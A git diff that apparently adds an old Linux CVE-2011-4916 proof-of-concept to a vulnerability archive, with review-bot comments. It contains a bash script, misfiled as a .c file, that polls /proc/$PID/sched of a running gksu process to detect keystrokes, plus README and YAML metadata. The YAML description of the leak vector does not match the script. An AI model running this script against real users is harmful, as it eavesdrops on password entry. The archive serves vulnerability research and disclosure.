diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c
new file mode 100644
index 0000000000000000000000000000000000000000..df2656d18d267c4d0b5eca166fb9c78acf70162d
--- /dev/null
+++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c
@@ -0,0 +1,57 @@
+#!/bin/bash
+#
+# A PoC for spying for keystrokes in gksu in Linux <= 3.1.
+#
+# /proc/$PID/{sched,schedstat} are world readable, so we can just loop
+# on one CPU core while the victim is executed on another, and spy for
+# the changes of scheduling counters. The PoC counts only keystrokes number,
+# but it can be easily extended to note the delays between the keystrokes
+# and do the statistical analysis to learn the input characters. See
+# e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on
+# Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang.
+#
+# It is NOT stable, it only shows a design flaw (the lack of proper
+# permission model of procfs debugging counters). The constants are true
+# for the author's system only and don't take into account other sources of
+# gksu CPU activity.
+#
+# by segoon from openwall
+#
+# run as: spy-sched gksu
+
+PNAME="$1"
+
+while :; do
+ PID=`pgrep "$PNAME"`
+ if [ -n "$PID" ]; then
+ echo $PID
+ cd /proc/$PID/
+ break
+ fi
+ sleep 1
+done
+
+S=0.0
+while :; do
+ V=`grep se.exec_start sched 2>/dev/null | cut -d: -f2-`
+ [ -z "$V" ] && break
+ if [ "$V" != "$S" ]; then
+ VAL=`echo "$V - $S" | bc -l`
+ VALI=`echo $VAL | cut -d. -f1`
+ [ -z "$VALI" ] && VALI=0
+
+ if [ "$VALI" -le 815 -a "$VALI" -ge 785 ]; then
+ # Cursor appeared
+ :
+ elif [ $VALI -le 415 -a $VALI -ge 385 ]; then
+ # Cursor disappeared
+ :
+ elif [ $VALI -ge 150 ]; then
+ echo "$VAL (KEY PRESSED)"
+ else
+ echo "$VAL"
+ fi
+
+ S=$V
+ fi
+done
\ No newline at end of file
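Review bot: The file is committed as `CVE-2011-4916.c`, but its first line is `#!/bin/bash` and the body is a shell script, so the extension mislabels it for anyone indexing this corpus by language; the header's own `run as: spy-sched gksu` suggests a script name, and `.sh` would match the content. In the first loop, `cd /proc/$PID/` is unchecked: `pgrep "$PNAME"` can return several newline-separated PIDs, the `cd` then fails, and the second loop's `grep se.exec_start sched` reads a non-existent file in the old working directory and hits `[ -z "$V" ] && break`, so the script exits silently with no indication of why; `cd "/proc/$PID/" || exit 1` would at least make the failure visible. The header already states the numeric thresholds are specific to the author's system, which is worth keeping prominent since the `[ … -a … ]` comparisons rely entirely on them.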
diff --git a/cve/linux-kernel/2011/CVE-2011-4916/README.md b/cve/linux-kernel/2011/CVE-2011-4916/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..6ca03d6eec915dca8323e7e512c9d8b8b44e5bf3
--- /dev/null
+++ b/cve/linux-kernel/2011/CVE-2011-4916/README.md
@@ -0,0 +1,14 @@
+A PoC for spying for keystrokes in gksu in Linux <= 3.1.
+
+/proc/$PID/{sched,schedstat} are world readable, so we can just loop
+on one CPU core while the victim is executed on another, and spy for
+the changes of scheduling counters. The PoC counts only keystrokes number,
+but it can be easily extended to note the delays between the keystrokes
+and do the statistical analysis to learn the input characters. See
+e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on
+Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang.
+
+It is NOT stable, it only shows a design flaw (the lack of proper
+permission model of procfs debugging counters). The constants are true
+for the author's system only and don't take into account other sources of
+gksu CPU activity.
\ No newline at end of file
diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..2442cf53bf25b63bd754c9e28f7caa1c270bf1d0
--- /dev/null
+++ b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml
@@ -0,0 +1,18 @@
+id: CVE-2011-4916
+source: https://www.openwall.com/lists/oss-security/2011/11/05/3
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: medium
+ description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。
+ scope-of-influence:
+ Linux kernel <= 3.1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2011-4916
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 5.5
+ cve-id: CVE-2011-4916
+ cwe-id: CWE-200
+ cnvd-id: None
+ kve-id: None
+ tags: information disclosure
\ No newline at end of file
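Review bot: The `description` in `CVE-2011-4916.yaml` says the keystroke leak is via access to `/dev/pts/` and `/dev/tty*`, while the PoC and README added in the same commit describe reading the world-readable `/proc/$PID/sched` counters; a reader of this entry will not find the PoC's actual vector described. A one-line addition to `description` (or a second `reference` entry naming the openwall post already given as `source`) would tie the entry to the script it ships with. `cnvd-id: None` and `kve-id: None` parse as the string `None` rather than an absent value; if "not assigned" is meant, `null` (or `~`) is the conventional YAML spelling, though I can't tell whether consumers of this corpus expect the literal string. The nesting under `info:` cannot be verified here because the indentation was collapsed in this view.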
diff --git a/other_list.yaml b/other_list.yaml
index cf82c0bd64c126427ee669564a1581a3da116ffd..6280d85a77dcc9195f6e460de6e0549a92491a76 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -15,6 +15,7 @@ cve:
 - CVE-2023-0179
 - CVE-2018-18955
 - CVE-2011-4917
+ - CVE-2011-4916
 polkit:
 - CVE-2021-3560
 Outlook: